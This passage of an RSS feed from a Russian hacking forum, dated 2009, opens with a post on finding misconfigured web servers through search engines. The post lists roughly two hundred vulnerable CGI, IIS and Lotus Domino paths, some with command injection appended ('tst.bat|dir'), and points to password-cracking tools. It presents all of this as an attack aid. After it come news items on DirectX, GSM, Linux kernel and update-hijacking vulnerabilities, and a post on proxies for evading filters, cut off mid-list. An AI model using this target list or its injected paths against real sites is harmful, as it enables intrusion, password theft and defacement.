			<description>&lt;p&gt;Что мы ищем? Одна из уязвимостей веб-сайтов это открытые директории. Многие администраторы часто забывают помнять настройrи выставленные сервером по умолчанию. Такие ошибки в обычно приводят к дефейсу веб-страницы. &lt;br /&gt;Что дают нам открытые директории? &lt;br /&gt;Например, через дериктории cgi-bin или scripts можно исполнить любой скрипт на удаленной машине. Через директорию _vti_bin (сайт под управление FrontPage), через утилиту shtml.exe можно просмотреть любой файл на диске. А, например, в директории vti_pvt содержатся все пароли доступа к FrontPage Extension (файл service.pwd). Рассшифровать полученные пароли я думаю труда не составит. Весь необходимый для дешифровки софт Вы можете найти на wwwhsy-net.tk в разделе Crack. &lt;br /&gt;Где искать? &lt;br /&gt;Это самый простой вопрос. Набираем wwwgoogle.com или любой другой поисковик вводим нужную фразу и вперед, остаеться только пересмотреть результаты пойска :). Иногда это не простая задача. Например на запрос /ets/passwd yahoo выдал 102000 результатов. Но думаю для настоящего хакера это не проблема. &lt;br /&gt;Список &lt;br /&gt;А вот наконец и сам список: &lt;/p&gt;
						&lt;p&gt;/cgi-bin/axs.cgi &lt;br /&gt;/cgi-bin/bash &lt;br /&gt;/cgi-bin/bb-hist.sh &lt;br /&gt;/cgi-bin/bigconf.cgi &lt;br /&gt;/cgi-bin/bnbform &lt;br /&gt;/cgi-bin/bnbform.cgi &lt;br /&gt;/cgi-bin/cachemgr.cgi &lt;br /&gt;/cgi-bin/calendar &lt;br /&gt;/cgi-bin/campas &lt;br /&gt;/cgi-bin/carbo.dll &lt;br /&gt;/cgi-bin/cgimail.exe &lt;br /&gt;/cgi-bin/Cgitest.exe &lt;br /&gt;/cgi-bin/cgiwrap &lt;br /&gt;/cgi-bin/classified.cgi &lt;br /&gt;/cgi-bin/classifieds &lt;br /&gt;/cgi-bin/classifieds.cgi &lt;br /&gt;/cgi-bin/Count.cgi &lt;br /&gt;/cgi-bin/csh &lt;br /&gt;/cgi-bin/date &lt;br /&gt;/cgi-bin/day5datacopier.cgi &lt;br /&gt;/cgi-bin/day5notifier &lt;br /&gt;/cgi-bin/dbmlparser.exe &lt;br /&gt;/cgi-bin/download.cgi &lt;br /&gt;/cgi-bin/dumpenv.pl &lt;br /&gt;/cgi-bin/edit.pl &lt;br /&gt;/cgi-bin/environ.cgi &lt;br /&gt;/cgi-bin/excite &lt;br /&gt;/cgi-bin/faxsurvey &lt;br /&gt;/cgi-bin/faxsurvey &lt;br /&gt;/cgi-bin/filemail &lt;br /&gt;/cgi-bin/filemail.pl &lt;br /&gt;/cgi-bin/files.pl &lt;br /&gt;/cgi-bin/finger &lt;br /&gt;/cgi-bin/finger.cgi &lt;br /&gt;/cgi-bin/finger.pl &lt;br /&gt;/cgi-bin/flexform &lt;br /&gt;/cgi-bin/flexform.cgi &lt;br /&gt;/cgi-bin/FormHandler.cgi &lt;br /&gt;/cgi-bin/formmail.pl &lt;br /&gt;/cgi-bin/fortune &lt;br /&gt;/cgi-bin/fpexplorer.exe &lt;br /&gt;/cgi-bin/get32.exe|dir &lt;br /&gt;/cgi-bin/glimpse &lt;br /&gt;/cgi-bin/guestbook.cgi &lt;br /&gt;/cgi-bin/guestbook.pl &lt;br /&gt;/cgi-bin/GW5 &lt;br /&gt;/cgi-bin/GWWEB.EXE &lt;br /&gt;/cgi-bin/handler &lt;br /&gt;/cgi-bin/handler.cgi &lt;br /&gt;/cgi-bin/htmlscript &lt;br /&gt;/cgi-bin/htmlscript &lt;br /&gt;/cgi-bin/info2www &lt;br /&gt;/cgi-bin/input.bat &lt;br /&gt;/cgi-bin/input2.bat &lt;br /&gt;/cgi-bin/jj &lt;br /&gt;/cgi-bin/ksh &lt;br /&gt;/cgi-bin/lwgate &lt;br /&gt;/cgi-bin/LWGate.cgi &lt;br /&gt;/cgi-bin/lwgate.cgi &lt;br /&gt;/cgi-bin/MachineInfo &lt;br /&gt;/cgi-bin/mail &lt;br /&gt;/cgi-bin/maillist.pl &lt;br /&gt;/cgi-bin/man.sh &lt;br /&gt;/cgi-bin/mlog.phtml &lt;br /&gt;/cgi-bin/mylog.phtml &lt;br /&gt;/cgi-bin/nlog-smb.pl &lt;br /&gt;/cgi-bin/nph-error.pl &lt;br /&gt;/cgi-bin/nph-publish &lt;br /&gt;/cgi-bin/nph-test-cgi &lt;br /&gt;/cgi-bin/passwd &lt;br /&gt;/cgi-bin/passwd.txt &lt;br /&gt;/cgi-bin/password &lt;br /&gt;/cgi-bin/password.txt &lt;br /&gt;/cgi-bin/perl &lt;br /&gt;/cgi-bin/perl.exe &lt;br /&gt;/cgi-bin/perlshop.cgi &lt;br /&gt;/cgi-bin/pfdispaly.cgi &lt;br /&gt;/cgi-bin/phf &lt;br /&gt;/cgi-bin/phf.pp &lt;br /&gt;/cgi-bin/php &lt;br /&gt;/cgi-bin/php.cgi &lt;br /&gt;/cgi-bin/phpscan &lt;br /&gt;/cgi-bin/post-query &lt;br /&gt;/cgi-bin/ppdscgi.exe &lt;br /&gt;/cgi-bin/query &lt;br /&gt;/cgi-bin/redirect &lt;br /&gt;/cgi-bin/responder.cgi &lt;br /&gt;/cgi-bin/rguest.exe &lt;br /&gt;/cgi-bin/rksh &lt;br /&gt;/cgi-bin/rsh &lt;br /&gt;/cgi-bin/rwwwshell.pl &lt;br /&gt;/cgi-bin/sam._ &lt;br /&gt;/cgi-bin/search.cgi &lt;br /&gt;/cgi-bin/search97.vts &lt;br /&gt;/cgi-bin/sendform.cgi &lt;br /&gt;/cgi-bin/sh &lt;br /&gt;/cgi-bin/snorkerz.bat &lt;br /&gt;/cgi-bin/snorkerz.cmd &lt;br /&gt;/cgi-bin/status.cgi &lt;br /&gt;/cgi-bin/survey &lt;br /&gt;/cgi-bin/survey.cgi &lt;br /&gt;/cgi-bin/tcsh &lt;br /&gt;/cgi-bin/test.bat &lt;br /&gt;/cgi-bin/test-cgi &lt;br /&gt;/cgi-bin/test-cgi.tcl &lt;br /&gt;/cgi-bin/test-env &lt;br /&gt;/cgi-bin/textcounter.pl &lt;br /&gt;/cgi-bin/tst.bat &lt;br /&gt;/cgi-bin/tst.bat|dir &lt;br /&gt;/cgi-bin/unlg1.1 &lt;br /&gt;/cgi-bin/upload.pl &lt;br /&gt;/cgi-bin/uptime &lt;br /&gt;/cgi-bin/view-source &lt;br /&gt;/cgi-bin/visadmin.exe &lt;br /&gt;/cgi-bin/visitor.exe &lt;br /&gt;/cgi-bin/w3-msql &lt;br /&gt;/cgi-bin/w3-sql &lt;br /&gt;/cgi-bin/w3tvars.pm &lt;br /&gt;/cgi-bin/wais.pl &lt;br /&gt;/cgi-bin/webdist.cgi &lt;br /&gt;/cgi-bin/webgais &lt;br /&gt;/cgi-bin/webmap.cgi &lt;br /&gt;/cgi-bin/websendmail &lt;br /&gt;/cgi-bin/wguest.exe &lt;br /&gt;/cgi-bin/whois_raw.cgi &lt;br /&gt;/cgi-bin/wrap &lt;br /&gt;/cgi-bin/wwwadmin.pl &lt;br /&gt;/cgi-bin/wwwboard.pl &lt;br /&gt;/cgi-bin/www-sql &lt;br /&gt;/cgi-bin/zsh &lt;br /&gt;/cgi-dos/args.bat &lt;br /&gt;/cgi-dos/args.cmd &lt;br /&gt;/cgi-shl/win-c-sample.exe &lt;br /&gt;/cgi-win/uploader.exe &lt;br /&gt;/cool-logs/mlog.html &lt;br /&gt;/cool-logs/mylog.html &lt;br /&gt;/database.nsf &lt;br /&gt;/database.nsf &lt;br /&gt;/domcfg.nsf &lt;br /&gt;/domlog.nsf &lt;br /&gt;/hosts.dat &lt;br /&gt;/iisadmpwd/achg.htr &lt;br /&gt;/IISADMPWD/achg.htr &lt;br /&gt;/iisadmpwd/aexp.htr &lt;br /&gt;/iisadmpwd/aexp2.htr &lt;br /&gt;/iisadmpwd/aexp2b.htr &lt;br /&gt;/iisadmpwd/aexp3.htr &lt;br /&gt;/iisadmpwd/aexp4.htr &lt;br /&gt;/iisadmpwd/aexp4b.htr &lt;br /&gt;/iisadmpwd/anot.htr &lt;br /&gt;/iisadmpwd/anot3.htr &lt;br /&gt;/iissamples/exair/howitworks/codebrws.asp &lt;br /&gt;/iissamples/sdk/asp/docs/codebrws.asp &lt;br /&gt;/log.nsf &lt;br /&gt;/manage/cgi/cgiproc &lt;br /&gt;/msadc/msadcs.dll &lt;br /&gt;/msadc/samples/adctest.asp &lt;br /&gt;/msadc/Samples/SELECTOR/codebrws.cfm &lt;br /&gt;/msadc/Samples/SELECTOR/showcode.asp &lt;br /&gt;/msads/samples/selector/showcode.asp &lt;br /&gt;/names.nsf &lt;br /&gt;/names.nsf &lt;br /&gt;/passwd &lt;br /&gt;/passwd.txt &lt;br /&gt;/password &lt;br /&gt;/password.txt &lt;br /&gt;/publisher/ &lt;br /&gt;/samples/search/queryhit.htm &lt;br /&gt;/scripts/CGImail.exe &lt;br /&gt;/scripts/convert.bas &lt;br /&gt;/scripts/counter.exe &lt;br /&gt;/scripts/cpshost.dll &lt;br /&gt;/scripts/fpcount.exe &lt;br /&gt;/scripts/iisadmin/bdir.htr &lt;br /&gt;/scripts/iisadmin/ism.dll &lt;br /&gt;/scripts/iisadmin/tools/ctss.idc &lt;br /&gt;/scripts/iisadmin/tools/getdrvrs.exe &lt;br /&gt;/scripts/iisadmin/tools/mkilog.exe &lt;br /&gt;/scripts/issadmin/bdir.htr &lt;br /&gt;/scripts/perl &lt;br /&gt;/scripts/postinfo.asp &lt;br /&gt;/scripts/proxy/w3proxy.dll &lt;br /&gt;/scripts/samples/ctguestb.idc &lt;br /&gt;/scripts/samples/details.idc &lt;br /&gt;/scripts/samples/search/webhits.exe &lt;br /&gt;/scripts/tools/dsnform.exe &lt;br /&gt;/scripts/tools/getdrvrs.exe &lt;br /&gt;/scripts/tools/getdrvs.exe &lt;br /&gt;/scripts/tools/newdsn.exe &lt;br /&gt;/scripts/upload.asp &lt;br /&gt;/scripts/uploadn.asp &lt;br /&gt;/scripts/uploadx.asp &lt;br /&gt;/search &lt;br /&gt;/search97.vts &lt;br /&gt;/secure/.htaccess &lt;br /&gt;/secure/.wwwacl &lt;br /&gt;/session/adminlogin &lt;br /&gt;/showfile.asp &lt;br /&gt;/smdata.dat &lt;br /&gt;/ssi/envout.bat &lt;br /&gt;/today.nsf &lt;br /&gt;/tree.dat &lt;br /&gt;/WebSTAR &lt;br /&gt;/ws_ftp.ini &lt;br /&gt;/wwwboard/passwd.txt &lt;/p&gt;
						&lt;p&gt;Удачной рыбалки :))&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:30:14 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=41#p41</guid>
		</item>
		<item>
			<title>В Microsoft DirectX найдена опасная «брешь»</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=40#p40</link>
			<description>&lt;p&gt;В Microsoft DirectX найдена опасная «брешь»&lt;/p&gt;
						&lt;p&gt;Корпорация Microsoft предупреждает о наличии опасной «дыры» в одном из компонентов программного интерфейса DirectX.&lt;/p&gt;
						&lt;p&gt;Как сообщается в официальном уведомлении, проблема связана с модулем DirectShow, используемым для ввода/вывода аудио- и/или видеоданных.&lt;/p&gt;
						&lt;p&gt;Вынудив жертву открыть сформированный специальным образом медиафайл в формате QuickTime, злоумышленник может получить несанкционированный доступ к удаленному компьютеру с привилегиями текущего пользователя.&lt;/p&gt;
						&lt;p&gt;Таким образом, если владелец ПК вошел в систему в качестве администратора, нападающий сможет выполнить на машине произвольный программный код.&lt;/p&gt;
						&lt;p&gt;Уязвимость обнаружена в операционных системах Windows 2000 с четвертым сервис-паком, Windows XP и Windows Server 2003. Платформы Windows Vista и Windows Server 2008, по предварительным данным, «дыры» не содержат.&lt;/p&gt;
						&lt;p&gt;«Майкрософт» отмечает, что уже зарегистрированы случаи практической эксплуатации уязвимости — впрочем, они носят пока ограниченный характер.&lt;/p&gt;
						&lt;p&gt;Компания занимается решением проблемы. Не исключено, что «заплатка» для уязвимости войдет в следующую порцию патчей, которая будет выпущена 9 июня.&lt;/p&gt;
						&lt;p&gt;Подготовлено по материалам Microsoft.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:28:56 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=40#p40</guid>
		</item>
		<item>
			<title>«Лаборатория Касперского» рассказала об уязвимостях Wi-Fi</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=39#p39</link>
			<description>&lt;p&gt;«Лаборатория Касперского» представляет аналитическую статью «Лето – время беспроводной связи». Статья посвящена вопросам безопасности Wi-Fi – популярного стандарта беспроводного доступа в локальные сети и Интернет.&lt;/p&gt;
						&lt;p&gt;Автор статьи – вирусный аналитик «Лаборатории Касперского» в Центральной Европе Кристиан Функ. В статье рассматриваются угрозы, связанные с Wi-Fi, их возможные последствия, меры защиты, а также альтернативный вариант беспроводной связи – сотовый стандарт нового поколения UMTS.&lt;/p&gt;
						&lt;p&gt;Как отмечает автор, именно сейчас, в летний сезон, все большее количество пользователей уезжают в отпуска и начинают чаще использовать публичные точки Wi-Fi для выхода в Интернет. Это имеет ряд преимуществ, например, независимость от сотового провайдера, но также несет и угрозу нарушения целостности и конфиденциальности передаваемой информации.&lt;/p&gt;
						&lt;p&gt;По мнению автора статьи, Wi-Fi-сети уязвимы к атакам типа «человек посередине» (man-in-the-middle), при которых злоумышленник перехватывает канал связи, получая полный доступ к передаваемой информации. Целью таких атак могут быть пароли, логины, данные кредитных карт и другая конфиденциальная информация.&lt;/p&gt;
						&lt;p&gt;Кристиан Функ считает, что эффективным способом шифрования и туннелирования данных Wi-Fi является применение технологии виртуальных частных сетей (Virtual Private Network, VPN). Туристам, не имеющим домашнего или корпоративного VPN-сервера, возможно, следует воспользоваться услугами широко доступных сегодня VPN-сервисов.&lt;/p&gt;
						&lt;p&gt;Автор статьи рассматривает и альтернативную Wi-Fi технологию доступа в Интернет – сотовую связь 3-го поколения UMTS, поддерживающую оптимизированные алгоритмы аутентификации. Зона ее покрытия в европейских городах в настоящее время может достигать 90% территории, а цены – вполне конкурентоспособны.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:28:03 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=39#p39</guid>
		</item>
		<item>
			<title>Получить вредоносный код можно во время обновления программ</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=38#p38</link>
			<description>&lt;p&gt;Технические специалисты израильской компании Radware обнаружили новый метод заражения компьютеров злонамеренным софтом. Внедрение хакерского кода происходит в момент, когда компьютер-жертва производит обновление программного обеспечения. Израильские программисты говорят, что в процесс обновления можно без особых проблем вмешаться и фактически подменить обновляемое приложение. Итцик Котлер, один из разработчиков новой методики, говорит, что такому методу внедрения подвержены не менее сотни популярных приложений, используемых миллионам пользователей по всему миру. Radware разработала специальное программное обеспечение Ippon, которое позволяет проводить атаку и предлагает трехмерную демонстрацию всех проводимых действий. Показ новинки состоялся в рамках конференции Black Hat 2009, ежегодно проводимой в Лас-Вегасе, США. На сей раз на конференции собрались более 4000 ИТ-специалистов со всего мира. Принцип действия программы довольно прост: она сканирует пространство в поисках работающей WiFi-сети и проверяет передаваемый траффик на наличие специальных флагов обновления программ, сканирование осуществляется на уровне стандартного протокола HTTP. В том случае, если программа &amp;quot;унюхает&amp;quot; в трафике запросы на обновление софта, то она перехватывает их и отвечает перед легитимным сервером обновлений, передавая свой поток данных. &amp;quot;Ippon также способен подделывать сообщения, говоря популярным программам, что для них доступны обновления и предлагать их вместо данных с подлинных серверов. Злонамеренный код загружается на компьютер-жертву под видом легитимного софта и выполняется с привилегиями пользователя, загрузившего код&amp;quot;, - говорят в Radware. Решением в данном случае может стать использование цифровых подписей в процессе обновления. К примеру, все разработки Microsoft при обновлении такие подписи используют, однако есть масса программ, отказавшихся цифровых подписей. Кроме того, разработчики советуют пользователям загружать обновления только из защищенных сетей и быть особенно осторожными при работе в публичных беспроводных сетях.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:27:18 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=38#p38</guid>
		</item>
		<item>
			<title>Все GSМ звонки уязвимы к атакам хакером.</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=37#p37</link>
			<description>&lt;p&gt;На недавней конференции Hacking at Random (HAR).&lt;br /&gt;Karsten Nohl подробно разобрал план для крекинга стандартной ячейки GSM шифрования - А5/1, а так же, то &lt;br /&gt;что бы результаты были доступны для общего использования.&lt;/p&gt;
						&lt;p&gt;Последствия для бизнеса, частных лиц и мобильной индустрии огромны: &lt;br /&gt;- Это значит, что каждый имеющий 500$, радио карту и ноутбук смогут прослушивать GSM звонки&lt;br /&gt;- Преступники смогут перехватывать и отключать звонки.&lt;br /&gt;Стэн Шатт, вице-президента и директора, здравоохранению и безопасности в ABI Research, прокомментировал:&lt;br /&gt;&amp;quot;Потенциально эта новость может иметь глубокое влияние на индустрию сотовых телефонов, как вскрытие шифрования WEP повлиял на индустрии беспроводных локальных сетей.&amp;quot;&lt;br /&gt;Конечно, большинство людей понимали, что правительство было в состоянии перехватывать их телефонные соединения, но они считали себя более или менее защищенными от преступников&lt;br /&gt;и корпоративного шпионажа. Теперь нужно опасаться людей, изучающих ценную информацию об их счетах в банке, личных делах т.д. &lt;/p&gt;
						&lt;p&gt;Саймон Брэнсфилд-Гарт, президент Силлкрипт прокомментировал: &amp;quot;Все знали в течение достаточно долгого времени, что существовал теоретический возможность взлома. GSM. Эти новости означают, &lt;br /&gt;что теоретический риск станет очень реальным в течение следующих шести месяцев. &lt;/p&gt;
						&lt;p&gt;И теперь это - очень беспокойная перспектива&lt;br /&gt;любого, который обсуждает ценную или конфиденциальную информацию по их мобильному телефону.&amp;quot;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:26:17 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=37#p37</guid>
		</item>
		<item>
			<title>В Google Docs обнаружены уязвимости</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=36#p36</link>
			<description>&lt;p&gt;Многие пользователи онлайн-системы Google Docs сообщают о проблемах с печатью, экспортом и загрузкой определенных файлов. В Google признают, что проблема образовалась после проведения серии последних обновлений в онлайновом офисном наборе. В данный момент на дискуссионных форумах появляются все новые и новые сообщения от пользователей, которые оказались не в состоянии воспользоваться собственными данными.&lt;/p&gt;
						&lt;p&gt;В Google официально признали наличие проблемы несколько часов назад, однако пока не дают никаких прогнозов, относительно того, когда она будет исправлена.&lt;/p&gt;
						&lt;p&gt;По предположению сторонних экспертов, сбой был вызван наличие функции файлообмена в Google Docs.&lt;/p&gt;
						&lt;p&gt;Накануне компания реализовала важную для корпоративных пользователей технологию в системе онлайнового офисного набора Google Docs. Пользователи платной версии системы Google Apps Premier Edition смогли обмениваться друг с другом служебными файлами и предоставлять доступ к своим файлам коллегам по работе. &lt;/p&gt;
						&lt;p&gt;Выставление привилегий файлам и папкам происходит по аналогии с системой управления привилегиями в Windows - выбирается папка и указывается кому и какие привилегии на нее предоставить. &amp;quot;Создавать и обмениваться данными в рамках Google Apps теперь очень просто, работники имеют шанс существенно повысить производительность труда без существенных затрат&amp;quot;, - говорили в Google.&lt;/p&gt;
						&lt;p&gt;По словам представителей интернет-гиганта, функция файлообмена была названа пользователями Google Apps во время голосования одной из наиболее востребованных. В ближайшее время в компании также готовятся обновить файловый загрузчик таким образом, чтобы он мог загружать несколько файлов или папок с файлами одновременно.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:25:32 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=36#p36</guid>
		</item>
		<item>
			<title>Разработан новый метод атаки на беспроводные устройства</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=35#p35</link>
			<description>&lt;p&gt;Группа исследователей систем информационной безопасности из центра Cryptography Research сообщила об обнаружении ранее неизвестного метода похищения криптографических ключей, используемых для защиты современных мобильных беспроводных систем связи. Новый метод позволяет также подделывать сессию аутентификации, что позволяет злоумышленнику выдать себя за того или иного легитимного пользователя.&lt;/p&gt;
						&lt;p&gt;В основе метода лежит технология дифференциального анализа мощности или, проще говоря, технология, измеряющая объемы электричества и радиочастоту, излучаемую беспроводным устройством. Еще проще: хакерское устройство просто подделывает ранее полученное электромагнитное колебание, используемое легитимным устройством для передачи на сервер аутентификации.&lt;/p&gt;
						&lt;p&gt;Бенджамин Джан, глава Cryptography Research и один из разработчиков технологии, говорит, что защититься от этой технологии можно двумя способами: использовать узконаправленные антенны или применять специальное оборудование. В масштабах компаний имеет смысл использовать оба метода, дабы свести вероятность кражи данных к минимуму.&lt;/p&gt;
						&lt;p&gt;Для захвата и анализа сигнала может быть использован обыкновенный осциллограф. В его задачу входит захват уровней излучения электрического сигнала и/или радиочастот. Когда данные с оциллографа оказываются в руках злоумышленника, то ему остается лишь понять, когда и откуда поступал запрос на передачу или прием пароля, либо когда начиналась сессия по передаче данных. С наличием некоторого опыта работы с технологиями радиоперехвата, сделать это совсем несложно.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Пока чип выполняет криптографические расчеты, он создает ключ несколькими способами. В данные моменты уровни излучения процессора колеблются и это можно зафиксировать. Например, кто-то с надлежащим оборудованием может похитить криптографические ключи от близлежащей беспроводной сети. Кроме того, таким же способом хакер может проникать в почтовые ящики жертв или проводить поддельные транзакции в системах онлайн-банкинга. Ему лишь надо точно воспроизвести радио- или электрический сигнал&amp;quot;, - говорит Джан.&lt;/p&gt;
						&lt;p&gt;В Cryptography Research рассказали, что особенно &amp;quot;хорошо ломаются&amp;quot; при помощи данного способа современные смартфоны, работающие с интернетом через беспроводные сети. Точных данных о том, какие именно смартфоны &amp;quot;хорошо ломаются&amp;quot; в компании не предоставили. Также в компании не сообщили, есть ли беспроводные технологии, не подверженные данной атаке.&lt;/p&gt;
						&lt;p&gt;&amp;quot;На практике такое нападение реализовать непросто, но вполне возможно. Наш метод - это не теория&amp;quot;, - говорит глава Cryptography Research. По его словам, впервые об удаленном электронном или радио-снятии сигнала хакеры заговорили еще лет 10 назад, правда тогда это касалось кассовых аппаратов и банкоматов.&lt;/p&gt;
						&lt;p&gt;В Cryptography Research говорят, что намерены производить специальное оборудование, предотвращающее данные атаки. Алгоритм действия оборудования будет основан на внесении случайных радио- и электрических шумов в сеанс передачи данных.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:25:01 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=35#p35</guid>
		</item>
		<item>
			<title>В ядре Linux обнаружена серьезная уязвимость</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=34#p34</link>
			<description>&lt;p&gt;Независимые разработчики программного обеспечения обнаружили в ядре операционной системы Linux серьезную уязвимость, позволяющую нелегитимным пользователям получить полный контроль над открытой операционной системой.&lt;/p&gt;
						&lt;p&gt;Проблема кроется в ошибочном коде ядра, точнее в одном из нулевых указателей. Группа разработчиков ядра сообщила, что уязвимость может быть устранена только в предстоящем релизе ядра 2.6.32, что потенциально делает уязвимыми всех пользователей данной ОС. Однако коммерческие производители Linux, такие как Red Hat или Novell, уже выпустили обновления для ядер в своих дистрибутивах, поэтому пользователям соответствующих дистрибутивов, имеющих действующие подписки, рекомендуется как можно скорее скачать патч для ядра или обновленную версию ядра.&lt;/p&gt;
						&lt;p&gt;Как пояснили в компании Red Hat, уже закрывшей данный баг для RHEL4 и 5, уязвимость кроется в функции mmap_min_addr, где не реализована должным образом защита. В том случае, если ИТ-администратор лично компилирует ядро из исходных кодов, то данную функцию в принципе можно временно отключить, а когда выйдет новая версия ядра, перекомпилировать его.&lt;/p&gt;
						&lt;p&gt;Впервые о данной уязвимости было сообщено 22 октября, когда в компании GRsecurity сообщили о концептуальной уязвимости, позже стало очевидно, что уязвимость вполне практическая и может быть использована при помощи эксплоита.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:22:13 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=34#p34</guid>
		</item>
		<item>
			<title>Сайты для анонимного просмотр веб-страниц (МНОГО)</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=33#p33</link>
			<description>&lt;p&gt;В связи с большим количеством вопросов &lt;/p&gt;
						&lt;p&gt;- закрыли доступ на Однокласники &lt;br /&gt;- закрыли доступ в Контакт &lt;br /&gt;- закрыли доступ Любмое порно.ru &lt;/p&gt;
						&lt;p&gt;Выкладываю способ для новичков как обойти сее негодование. &lt;/p&gt;
						&lt;p&gt;Небольшой FAQ &lt;/p&gt;
						&lt;p&gt;Что такое анонимный серфинг? &lt;/p&gt;
						&lt;p&gt;Анонимный просмотр просто просмотра World Wide Web с большинством ваших личных скрыт. Это делается главным образом на основе так называемого анонимного прокси на основе браузера. Эти веб-сайты, которые можно использовать для ввода адреса веб-страницы, которую вы хотели бы посетить, и услуга будет вам, что веб-сайт с информацией, таких, как местоположение компьютера и IP-адрес скрыт от веб-страницы. Например, когда пользователь пытается получить доступ к кое-что на определенной части Интернета, прокси-сервер будет говорить на этот файл в качестве посла на пользователя, обеспечивая конфиденциальность пользователя. Практика анонимного просмотра можно также сохранить конфиденциальность пользователей от потенциальных лесозаготовителей шпионажа пользователя соединение. &lt;/p&gt;
						&lt;p&gt;Эффективность Анонимный просмотр &lt;/p&gt;
						&lt;p&gt;Как анонимный просмотр также позволяет пользователю обхода ограничений, установленных в интернет-соединения, такие, как простой брандмауэр, оно широко используется техника. Это особенно часто используется в школах и отделениях, где Существуют ограничения на тяжелых веб-страниц, которые являются и не являются доступными. Студенты анонимно просматривать чтобы получить доступ к социальной сети сайтов заблокирован школы тек офиса, которые считаются сайты, как вредные для студентов. Офисные работники также анонимно просматривать, как это может помочь им в обход ограничений, установленных работодателями, или не оставляют каких-либо треков в том случае, если работодатели контроля за их использованием Интернета. &lt;/p&gt;
						&lt;p&gt;Риски Что Анонимный просмотр &lt;/p&gt;
						&lt;p&gt;Хотя анонимный просмотр, как представляется, решение полной анонимности, он может быть вредным. Это объясняется тем, что со стороны пользователя анонимно просмотра, они, используя анонимные прокси-сервера, который не шифрует данные, когда она направляется на прокси-сервере. Таким образом, важной информации, такой как логины, пароли и номера кредитных карт могут быть зарегистрированы и утечка на прокси-сервер администратора, который имеет опасный план. Пользователи, которые постоянно в поиске анонимно Люди также могут попасть Интернет ловушки, где отображение веб-страниц неправильно меры безопасности, в котором пользователь может верить и давать слишком много информации. Это может привести к еще большей катастрофы, чем неанонимный просмотра, так как прокси-сервер сам и любой прокси цепей при том, что прокси-сервер может видеть все, что пользователь информации. &lt;/p&gt;
						&lt;p&gt;Возможности для поиска в Web Proxy Service для анонимный серфинг &lt;/p&gt;
						&lt;p&gt;Хороший веб-прокси сервиса будет настроить SSL и TLS туннель с анонимным серфингом. Это позволит предотвратить сети сниферов от прослушивания на лицо, анонимный серфинг. &lt;/p&gt;
						&lt;p&gt;Некоторые прокси серверы поддержка FTP, в то время как другие только поддержку HTTP. Некоторые, но не все анонимные прокси-серверы поддержки HTTPS. Убедитесь в том, чтобы выбрать анонимные прокси-сервера, которые поддерживают протоколы вы хотите использовать. &lt;/p&gt;
						&lt;p&gt;В дополнение к скрывая ваш IP адрес анонимного прокси-сервера, как правило, устранить движения, такие, как: &lt;br /&gt;Печенье &lt;br /&gt;Скрипты &lt;br /&gt;Всплывающие окна &lt;br /&gt;Баннеры &lt;br /&gt;Реферер информации &lt;/p&gt;
						&lt;p&gt;Эти варианты должны быть настраивается на конечного пользователя, с тем чтобы к прокси-сервер для работы с веб-сайтами, которые требуют печенье или всплывающие окна. &lt;/p&gt;
						&lt;p&gt;(c) гдет... &lt;/p&gt;
						&lt;p&gt;Решил выложить сайты для анонимного серфинга по интернету. &lt;br /&gt;Собрано со всего простора интернета. &lt;br /&gt;Пользуйтесь. &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://proxy.3dn.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://proxy.3dn.ru/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.kproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.kproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.645.cc/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.645.cc/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.474.cc/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.474.cc/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anonymization.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymization.net/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.guardster.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.guardster.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxyweb.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyweb.net/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://webwarper.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://webwarper.net/&lt;/a&gt; &lt;br /&gt;&lt;a 